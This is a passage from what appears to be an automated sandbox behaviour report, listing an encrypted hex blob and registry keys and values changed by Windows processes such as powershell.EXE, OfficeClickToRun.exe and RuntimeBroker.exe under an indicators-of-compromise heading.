0100000001000000d08c9ddf0115d1118c7a00c04fc297eb010000004323056123d1c04da7710f37ab47d2270000000002000000000010660000000100002000000068b679ae67839269c3b497db082c60c79d7c7159f7c706637501284ae901145d000000000e8000000002000020000000a15d1bbf0508b5a3034b6f7e8ccbcf56a5fbdf212ae369ce3e3d7faeb18666181006000001821b858bf7fdb16a10819816305c8d6befcb97bf3145534f723d4be6344ca4907524b471373ce028df04c01527eb6280afff9d97a22d489d8f93db02c4a453b595bf1793a3726481555380c6acdafbb59ea980d9bcadd16d877a5d79fcd28f87c3332e3e496227eb0a9cfb5fc0315468b2a09212a8f6c43ee4aa4b69263602713c1aea282865c2d5a0d71ee15771a5bbb51111311a602e9ff5cf747fa202b8bc7ad556b5c1e57a255292c164b85b51d26542b1da991d11cd8262c18525738ca93214f86013723eac553305890104f95c4c58494f1ff1ca1850be5c2fcf884ea6bd84e8fb745a95c84c82dca8930a729c67d7567164d6359a33b46c3d2d74d1d4107251afd614803913bd88823173b91e998397754395ad8b27cb5c9433494997dd83e0ef17adda285a8384fecdc21a8b3cc3c8642772be14b1bc7a72ae1b677284f5e35e8a8cd36efaf7eb9d913f1df9741a18dd9b3162775818868c8453831e03d19b97ead652fe32e3687e753e6b9c7beebd01768c7ac28fa0a344f3767f598eea6ab09475b40a93488315b258e98467564a0bf1c7a4fb49de7f9f72728ffa5dd4136c249ff73563f149f8572368565638c247fea4ba4ce534a1b8478d9c55c6ddb882a2095ca7feae1829125daab982550b17ee4b78fa9009bbfa9a31c0da66358212152d1a76ea204f43b9fd8964b72b36ac32851cd14abe9b9012d35c55f1109fe37dd02c86953651c5aba0e4681515fe2394cf06ceb9dc7567d9bf0106ccf922917ab3d1dc620323e3461a4a42dbe2ca879d4fe3488c377c2e16e107ba166b9f6bbd1d07438ed7c6800982819db500e516c181fa6a30e826e601cc96f54d1f8b4f5e24c15b505cf784fd9ec7410fe178f9dbcac7cc5e0e958b062210a613a9b5c78c0a392d64ee9252f51c80ee1a4b5342020772a618a8d0750808227cefaef1ec1b5a4630911644be5ad10eb03a8553ea58c39c372e10767b634c25e6a5f42252d671110f06ddce5a02c3bc3a7efae60a589cbdeddd0f98528d504aa6d0d3763ec981c419db1633dcb5505f5d2cb62220f559089f2081aa328cf0902e8189a21241e2b5be2816e83d65b366ddb4abb3b1fbdc629f539db8cbee165d037602d6f1a83a7b1be40ca8beebd398a169c34e51f1ab2ee03afdc0ffe7bfd64e6d2b1480579015b3c760d8906c6a4ac0fc47b2ebaefbcc2d2853370941f36a548725ceb9d14fd79bd502f6eeedd08fba0561e5a0140d8b617a6391a6cf87bc01ac2356b8da3259819f586118cae49a7168e98e920c6d709a57e7b17c4d8199c90c1b190e0e7e68a879e70ab54776dcd9172181f939654a5896ba2f87fc621e4c173d1eb13ef8be2a2b108cd5c9bc6a19e478c1d948b7934395a08919eccad45933c25614c4a519a2dc41870db156fc015d3b6e019a97a27d6ef6f168d58deb52ff99564f6334e7bbc8c67181380e695ea762f8f182cc69e763bdd5a3877e97c5bacfcb91fce1efce500193fa4f4b539307d9a3256d56b3f5db9709366186ce3cc9efb150c60cc025a270b2b5ecefcce2964531f5038ecfced96850f9810b3b56d2fbc48afc96beea447ddcda6046cf916a132cec506f50e0ede96fbc23ef7cffdef85205577f304aa4fea5230f709356eec1c82be870898072c41e7c4dfe2b558a9916a4b191a3df753d8eeb87bd557b4c7ed28fc26a0c26b1c27f175d0aa6db962a1dbacb1728ff0e338d4a88672142e3a2a121408c2377e0d0a3e61c4ee8c4e3eef522e12f17ce2907fcb40da65523c3402086eb6d40f77b99d22c345bb5fd97d851886a5407c75d4b772dc81bd40b5e3fb6b061aaa96bfd33fa364a25f4172fc7941a0c60e4941a790ef1a259dd3f5bdec83257f2e0f6cf1b680fe2e234dbc8be077ca6a5cedfdeb9a41464edc15baec6439ddc5b2cdc2c9085bacf1d5a647b316e40fae80206f4e0242d283995dd859f0517699d2b3ed757c2b7d84be1dc5cf6f1161c3f8577358a526a30c39357ae604346011d07b6c46f87de06a2d61eee43a05ae356c913ca741e2b843d686f2527043c2c4968a0919099353063eccb85a50312de1c828154a9971ed58ba5ec8b53956786ad3d622674c4e31d8f3cfc4bb7cd6be1da46ef33be576bb96bb67d817d0239e1e41a07bdcd5b8f6f74a3d4384a4678e70f8244d6652764086d3240000000acae67bcaf07783ae088d51ab35c21abf43c1df7b265910bddb8ef02ac7d53f521156035a07a151aa6a93731f02f1755d1afabd272b75c00e88faff3af3d6eaf mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018401296332489" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018401296332489" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={8B7C720E-4BB3-439B-A34C-13B98B79CE31}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cc2bda6cf7b34d96dce3ac47661de2608ac5c1eb96a3c7d4e6be9801c688fc5f" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6252098e-82fe-4d13- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dc69f590-051d-47a4- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\dc69f590-051d-47a4- = "0" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ab30b15-3419-480e- = d9620c53178fdb01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c59a337f-6614-4bb1- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000dadc3b52178fdb0115b09152178fdb0115b09152178fdb011dc008000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab7212000333937613035353563613030363465353236336464383364383435616362626235663437636564333633616634373938366464333932326262383336373565350000b20009000400efbe675ab721675ab7212e0000000000000000000000000000000000000000000000000037a90b00330039003700610030003500350035006300610030003000360034006500350032003600330064006400380033006400380034003500610063006200620062003500660034003700630065006400330036003300610066003400370039003800360064006400330039003200320062006200380033003600370035006500350000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33393761303535356361303036346535323633646438336438343561636262623566343763656433363361663437393836646433393232626238333637356535000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb68e8f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb68e8f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\27d3965e-09a3-4cd4- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000456be851178fdb01456be851178fdb01456be851178fdb01000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab7212000366337376631376635626166393133353533396137343834666430343239326661383761656639656438326635613165353330303132303262383165356438380000b20009000400efbe675ab721675ab7212e00000000000000000000000000000000000000000000000000bbcd1200360063003700370066003100370066003500620061006600390031003300350035003300390061003700340038003400660064003000340032003900320066006100380037006100650066003900650064003800320066003500610031006500350033003000300031003200300032006200380031006500350064003800380000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c36633737663137663562616639313335353339613734383466643034323932666138376165663965643832663561316535333030313230326238316535643838000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb6878f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb6878f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- = 9199e752178fdb01 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ab30b15-3419-480e- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c59a337f-6614-4bb1- RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ff454ce7-952c-4f6e- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = "\\\\?\\Volume{27205DB7-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\cc2bda6cf7b34d96dce3ac47661de2608ac5c1eb96a3c7d4e6be9801c688fc5f" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a4891ab6-1d8a-470d- RuntimeBroker.exe Set value (int) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8ab30b15-3419-480e- = "8324" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\8343759a-28de-4320- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000bb644552178fdb01ea6e1253178fdb01ea6e1253178fdb014b9c0a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab8212000653633643762656362326564303263656430383731373731383030643762333734323961366532613332363637383137353135316439336335356565633836640000b20009000400efbe675ab821675ab8212e000000000000000000000000000000000000000000000000002f382001650036003300640037006200650063006200320065006400300032006300650064003000380037003100370037003100380030003000640037006200330037003400320039006100360065003200610033003200360036003700380031003700350031003500310064003900330063003500350065006500630038003600640000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65363364376265636232656430326365643038373137373138303064376233373432396136653261333236363738313735313531643933633535656563383664000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb6938f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb6938f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\27d3965e-09a3-4cd4- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\be682f84-64cf-4496- RuntimeBroker.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\be682f84-64cf-4496- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee70691c-3ad8-4700- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000004b173752178fdb019fc0c352178fdb019fc0c352178fdb01f71d09000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000675ab8212000636332626461366366376233346439366463653361633437363631646532363038616335633165623936613363376434653662653938303163363838666335660000b20009000400efbe675ab821675ab8212e00000000000000000000000000000000000000000000000000b0862e01630063003200620064006100360063006600370062003300340064003900360064006300650033006100630034003700360036003100640065003200360030003800610063003500630031006500620039003600610033006300370064003400650036006200650039003800300031006300360038003800660063003500660000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000005996153c1000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c63633262646136636637623334643936646365336163343736363164653236303861633563316562393661336337643465366265393830316336383866633566000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a058000000000000006672617676646165000000000000000056e1d5537eadee4ea3bd7fca2c496cb6918f726d4dedef11b4047afb1048af0756e1d5537eadee4ea3bd7fca2c496cb6918f726d4dedef11b4047afb1048af07ce000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003800370034003000370032003700310038002d0032003200300035003400390032003800300033002d003100310038003900340031003900300037002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000b75d2027000000000000d01200000000000000000000000000000000 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\27d3965e-09a3-4cd4- = dcd3ee51178fdb01 RuntimeBroker.exe Key created \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\ee00168f-5b6e-4573- RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\be682f84-64cf-4496- = e2870c52178fdb01 RuntimeBroker.exe Key deleted \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000_Classes\Local 